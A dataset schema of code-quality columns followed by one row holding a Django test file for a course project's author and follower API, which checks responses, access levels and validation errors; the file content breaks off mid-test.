Dataset schema (113 columns; column name and dtype):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
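A minimal sketch of filtering a shard on the quality-signal columns, assuming the data is stored as Parquet with the schema above (the shard path is hypothetical):

```python
# Hedged sketch: load one shard and filter on quality signals.
# The file path is hypothetical; only the column names come from the schema.
import pandas as pd

df = pd.read_parquet("data/shard-00000.parquet")  # hypothetical shard path

# Keep Python files with low line-level duplication and a reasonable
# fraction of alphabetic characters.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_code_frac_lines_dupe_lines_quality_signal"] < 0.5)
    & (df["qsc_code_frac_chars_alphabet_quality_signal"] > 0.6)
)
print(df.loc[mask, ["max_stars_repo_name", "size", "max_stars_count"]].head())
```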
Row 1 metadata:

| Field | Value |
|---|---|
| hexsha | 5d2368d66a9431e65ae2ab4e3382842514bb7e03 |
| size | 45,552 |
| ext | py |
| lang | Python |
| max_stars_repo_path | tests/apis/authors/test_author_api.py |
| max_stars_repo_name | cmput404F21/CMPUT404-project-socialdistribution |
| max_stars_repo_head_hexsha | 47f108b43886a4e482c6b6f9c6fdef6dcc005c3f |
| max_stars_repo_licenses | ["W3C-20150513"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | tests/apis/authors/test_author_api.py |
| max_issues_repo_name | cmput404F21/CMPUT404-project-socialdistribution |
| max_issues_repo_head_hexsha | 47f108b43886a4e482c6b6f9c6fdef6dcc005c3f |
| max_issues_repo_licenses | ["W3C-20150513"] |
| max_issues_count | 48 |
| max_issues_repo_issues_event_min_datetime | 2021-10-12T21:41:39.000Z |
| max_issues_repo_issues_event_max_datetime | 2021-12-08T19:40:25.000Z |
| max_forks_repo_path | tests/apis/authors/test_author_api.py |
| max_forks_repo_name | cmput404F21/CMPUT404-project-socialdistribution |
| max_forks_repo_head_hexsha | 47f108b43886a4e482c6b6f9c6fdef6dcc005c3f |
| max_forks_repo_licenses | ["W3C-20150513"] |
| max_forks_count | 1 |
| max_forks_repo_forks_event_min_datetime | 2022-01-11T04:07:43.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-01-11T04:07:43.000Z |

Row 1 content:
```python
from django.test import TestCase
from django.urls import reverse
import json
from rest_framework.test import APIClient
from tests.test_helper.auth_helper import AuthHelper
from apps.core.models import Author, User
from uuid import uuid4


class AuthorViewTests(TestCase):

    def createAdmin(self):
        self.auth_helper = AuthHelper()
        self.auth_helper.setup()
        self.client = APIClient()
        self.auth_helper.authorize_client(self.client)

    def test_get_authors(self):
        """
        should retrieve all authors in db
        """
        host = "http://testserver"
        displayName = "testUser1"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        displayName2 = "testUser2"
        github2 = "https://github.com/testUser2"
        profileImage2 = "https://www.website.com/pfp2.png"
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        author.displayName = displayName
        author.github = github
        author.profileImage = profileImage
        author.save()
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        author2.displayName = displayName2
        author2.github = github2
        author2.profileImage = profileImage2
        author2.save()
        response = self.client.get(reverse("author:authors"))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        authorList = json.loads(response.content)["data"]
        self.assertEqual(len(authorList), 2)
        data: dict = authorList[0]
        self.assertTrue("id" in data, "an author is missing the id field!")
        if data["id"] == str(author.id):
            self.assertEqual(data["type"], "author", "returned author had wrong type!")
            self.assertEqual(data["id"], str(author.id), "returned author did not match one of the created ones!")
            self.assertEqual(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
            self.assertEqual(data["host"], host, "returned author had wrong host!")
            self.assertEqual(data["displayName"], displayName, "returned author did not match one of the created ones!")
            self.assertEqual(data["github"], github, "returned author did not match one of the created ones!")
            self.assertEqual(data["profileImage"], profileImage, "returned author did not match one of the created ones!")
            data: dict = authorList[1]
            self.assertEqual(data["type"], "author", "returned author had wrong type!")
            self.assertEqual(data["id"], str(author2.id), "returned author did not match one of the created ones!")
            self.assertEqual(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
            self.assertEqual(data["host"], host, "returned author had wrong host!")
            self.assertEqual(data["displayName"], displayName2, "returned author did not match one of the created ones!")
            self.assertEqual(data["github"], github2, "returned author did not match one of the created ones!")
            self.assertEqual(data["profileImage"], profileImage2, "returned author did not match one of the created ones!")
        else:
            self.assertEqual(data["type"], "author", "returned author had wrong type!")
            self.assertEqual(data["id"], str(author2.id), "returned author did not match one of the created ones!")
            self.assertEqual(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
            self.assertEqual(data["host"], host, "returned author had wrong host!")
            self.assertEqual(data["displayName"], displayName2, "returned author did not match one of the created ones!")
            self.assertEqual(data["github"], github2, "returned author did not match one of the created ones!")
            self.assertEqual(data["profileImage"], profileImage2, "returned author did not match one of the created ones!")
            data: dict = authorList[1]
            self.assertEqual(data["type"], "author", "returned author had wrong type!")
            self.assertEqual(data["id"], str(author.id), "returned author did not match one of the created ones!")
            self.assertEqual(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
            self.assertEqual(data["host"], host, "returned author had wrong host!")
            self.assertEqual(data["displayName"], displayName, "returned author did not match one of the created ones!")
            self.assertEqual(data["github"], github, "returned author did not match one of the created ones!")
            self.assertEqual(data["profileImage"], profileImage, "returned author did not match one of the created ones!")

    def test_get_authors_access_levels(self):
        """
        should return 200 for all users
        """
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        author.save()
        # test anonymous users
        response = self.client.get(reverse("author:authors"))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test regular user
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.get(reverse("author:authors"))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.get(reverse("author:authors"))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_get_authors_empty_db(self):
        """
        should return an empty list
        """
        response = self.client.get(reverse("author:authors"))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        self.assertEqual(len(json.loads(response.content)["data"]), 0, "GET /authors is returning something even with an empty db!")

    # ############################################################
    # # SINGLE AUTHOR TESTS
    # ############################################################

    # GETs #####################
    def test_get_author(self):
        """
        should return appropriate author from db
        """
        host = "http://testserver"
        displayName = "testUser1"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        displayName2 = "testUser2"
        github2 = "https://github.com/testUser2"
        profileImage2 = "https://www.website.com/pfp2.png"
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        author.displayName = displayName
        author.github = github
        author.profileImage = profileImage
        author.save()
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        author2.displayName = displayName2
        author2.github = github2
        author2.profileImage = profileImage2
        author2.save()
        response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        data: dict = json.loads(response.content)
        self.assertEqual(data["type"], "author", "returned author had wrong type!")
        self.assertEqual(data["id"], str(author2.id), "returned author had wrong id!")
        self.assertEqual(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
        self.assertEqual(data["host"], host, "returned author had wrong host!")
        self.assertEqual(data["displayName"], displayName2, "returned author had wrong displayName!")
        self.assertEqual(data["github"], github2, "returned author had wrong github!")
        self.assertEqual(data["profileImage"], profileImage2, "returned author had wrong profileImage!")

    def test_get_author_access_levels(self):
        """
        should return 200 for all users
        """
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        author.save()
        user2 = User.objects.create_user("username2", password=password)
        author2: Author = Author.objects.get(userId=user2)
        author2.save()
        # test anonymous user
        response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test regular user
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test subject of call
        self.client.logout()
        self.assertTrue(self.client.login(username=user2.username, password=password))
        response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_get_author_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        response = self.client.get(reverse("author:author", kwargs={"author_id":uuid4()}))
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_get_author_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        response = self.client.get(reverse("author:author", kwargs={"author_id":"notARealUUID"}))
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_get_author_empty_db(self):
        """
        should return 404
        """
        user = User(username="username1")
        response = self.client.get(reverse("author:author", kwargs={"author_id":user.id}))
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    # POSTs ####################
    def test_post_author(self):
        """
        create a user and carry out a post request. Should return
        an author that is associated with the original user, but with
        modified fields
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        author.save()
        # we haven't set these fields
        self.assertEqual(author.displayName, "username1")
        self.assertEqual(author.github, "")
        self.assertEqual(author.profileImage, "")
        authorType = "author"
        host = "http://testserver"
        url = host + "/author/" + str(author.id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{author.id}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        data: dict = json.loads(response.content)
        self.assertEqual(data["type"], "author", "returned author had wrong type!")
        self.assertEqual(data["id"], str(author.id), "returned author had wrong id!")
        self.assertEqual(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
        self.assertEqual(data["host"], host, "returned author had wrong host!")
        self.assertEqual(data["displayName"], displayName, "returned author had wrong displayName!")
        self.assertEqual(data["github"], github, "returned author had wrong github!")
        self.assertEqual(data["profileImage"], profileImage, "returned author had wrong profileImage!")
        # make sure changes propagated to db
        author2: Author = Author.objects.get(userId=user)
        self.assertEqual(author2.displayName, displayName)
        self.assertEqual(author2.github, github)
        self.assertEqual(author2.profileImage, profileImage)

    def test_post_author_access_levels(self):
        """
        should return 401 for anonymous users and 403 for all users except admins
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        author.save()
        # we haven't set these fields
        self.assertEqual(author.displayName, "username1")
        self.assertEqual(author.github, "")
        self.assertEqual(author.profileImage, "")
        authorType = "author"
        host = "http://testserver"
        url = host + "/author/" + str(author.id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{author.id}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        # test anonymous user
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
        # test non participant user
        nonParticipant = User.objects.create_user("nonParticipant", password=password)
        self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test subject of call
        self.client.logout()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_post_author_id_mismatch(self):
        """
        should return 400
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        user = User.objects.create_user("username1")
        author = Author.objects.get(userId=user)
        authorType = "author"
        host = "http://testserver"
        url = host + "/author/" + str(author.id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{uuid4()}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
        self.assertEqual(response.content.decode('utf-8'), "The id of the author in the body does not match the author_id in the request.")

    def test_post_author_host_mismatch(self):
        """
        should return 400
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        user = User.objects.create_user("username1")
        author = Author.objects.get(userId=user)
        authorType = "author"
        host = "http://someWrongHost"
        url = host + "/author/" + str(author.id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{author.id}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
        self.assertEqual(response.content.decode('utf-8'), "The author is not from a supported host.")

    def test_post_author_type_mismatch(self):
        """
        should return 400
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        user = User.objects.create_user("username1")
        author = Author.objects.get(userId=user)
        authorType = "someWrongType"
        host = "http://testserver"
        url = host + "/author/" + str(author.id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{author.id}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
        self.assertEqual(response.content.decode('utf-8'), "Can not change the type of an author")

    def test_post_author_user_nonexist(self):
        """
        should return 404
        """
        displayName = "testUser"
        github = "https://github.com/testUser"
        profileImage = "https://www.website.com/pfp.png"
        id = uuid4()
        authorType = "author"
        host = "http://testserver"
        url = host + "/author/" + str(id)
        json_str = f"""
        {{
            "type" : "{authorType}",
            "id" : "{id}",
            "displayName" : "{displayName}",
            "github" : "{github}",
            "profileImage" : "{profileImage}",
            "host" : "{host}",
            "url" : "{url}"
        }}
        """
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':id}), json.loads(json_str), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_post_author_empty_request(self):
        """
        should return 400
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), {}, format="json")
        self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")

    # ############################################################
    # # FRIEND AND FOLLOWER TESTS
    # ############################################################

    # PUTs #####################
    def test_put_follower(self):
        """
        should return 200
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_put_follower_access_levels(self):
        """
        should return 401 for anonymous users, 403 for non participants and the followee, and 200 for the follower and admins
        """
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2", password=password)
        author2: Author = Author.objects.get(userId=user2)
        # test anonymous user
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
        # test non participant user
        nonParticipant = User.objects.create_user("nonParticipant", password=password)
        self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test followee
        self.client.logout()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test follower
        self.client.logout()
        self.assertTrue(self.client.login(username=user2.username, password=password))
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_put_follower_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_put_follower_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_put_follower_author_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_put_follower_author_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_put_follower_twice(self):
        """
        should return 200
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_put_follower_is_one_sided(self):
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 1, f"expected 1 follow. got: {len(dict_resp_data)}")
        self.assertEqual(dict_resp_data[0]["id"], str(author2.id), "the follow request follows the wrong author!")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 0, "the request recipient is following the sender!")

    # GETs #####################
    def test_get_followers(self):
        """
        should return a list of the author's appropriate followers
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        user3 = User.objects.create_user("username3")
        author3: Author = Author.objects.get(userId=user3)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author3.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author3.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 2, f"expected 2 items. got: {len(dict_resp_data)}")
        data1 = dict_resp_data[0]
        data2 = dict_resp_data[1]
        if data1["id"] == str(author3.id):
            temp = data1
            data1 = data2
            data2 = temp
        self.assertEqual(data1["id"], str(author2.id), f"a user got a follow from the wrong author! Expected {str(author2.id)}")
        self.assertEqual(data2["id"], str(author3.id), f"a user got a follow from the wrong author! Expected {str(author3.id)}")

    def test_get_followers_access_levels(self):
        """
        should return 200 for all users
        """
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        # test anonymous user
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test non participant user
        nonParticipant = User.objects.create_user("nonParticipant", password=password)
        self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test follower
        self.client.logout()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")

    def test_get_followers_empty(self):
        """
        should return an empty list
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 0, "follower list wasn't empty!")

    def test_get_specific_follower(self):
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
